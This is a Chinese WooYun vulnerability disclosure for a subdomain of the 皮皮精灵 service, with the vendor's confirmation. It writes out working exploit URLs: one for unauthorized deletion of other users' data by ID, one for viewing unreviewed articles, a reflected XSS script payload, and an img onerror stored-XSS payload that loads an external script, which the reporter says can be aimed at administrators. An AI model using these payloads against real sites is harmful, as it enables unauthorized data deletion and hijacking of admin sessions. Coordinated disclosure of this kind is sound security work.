漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-027139
漏洞标题:皮皮精灵某分站一些小漏洞打包
相关厂商:皮皮精灵
漏洞作者: 齐迹
提交时间:2013-06-28 20:52
修复时间:2013-08-12 20:53
公开时间:2013-08-12 20:53
漏洞类型:未授权访问/权限绕过
危害等级:低
自评Rank:5
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-06-28: 细节已通知厂商并且等待厂商处理中
2013-06-29: 厂商已经确认,细节仅向厂商公开
2013-07-09: 细节向核心白帽子及相关领域专家公开
2013-07-19: 细节向普通白帽子公开
2013-07-29: 细节向实习白帽子公开
2013-08-12: 细节向公众公开
简要描述:
未授权删除其他用户数据,多处存储反射xss,越权查看其他用户内容。。。
详细说明:
问题站
http://wx.pp.cc
1越权删除其他用户举报
http://wx.pp.cc/wb_ajax/update_action?act=del&id_str=任意ID
2查看任意文章(不知道是不是本来就公开的,反正未审核的也可以查看)
http://wx.pp.cc/wb_ajax/preview/任意文章ID/1372420599?t=1372403376&preview=1
3 反射xss
http://wx.pp.cc/wb_advs/income?date=&keyword=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
4存储xss2枚
4-1 http://wx.pp.cc/wb_lodge/index
标题,内容,图片url均为过滤可以xss代码打管理
4-2 http://wx.pp.cc/wb_u/write
写文章编辑器过滤不到位
在源码模式下可以使用
<img src=1 onerror="with(document)body.appendChild(createElement('script')).src='xss'">
形成xss攻击 也可以打管理哦!
漏洞证明:
上面已证明,都是小洞 打包给你们了!
修复方案:
程序员都通宵加班修bug把!
版权声明:转载请注明来源 齐迹@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2013-06-29 10:02
厂商回复:
感谢齐迹的发现,说实话,皮皮微信的负责人之前已经被鞭过一次了。
img 标签上通过 onerror 执行 script 这个确实是我们没想到的,非常感谢。
最新状态:
暂无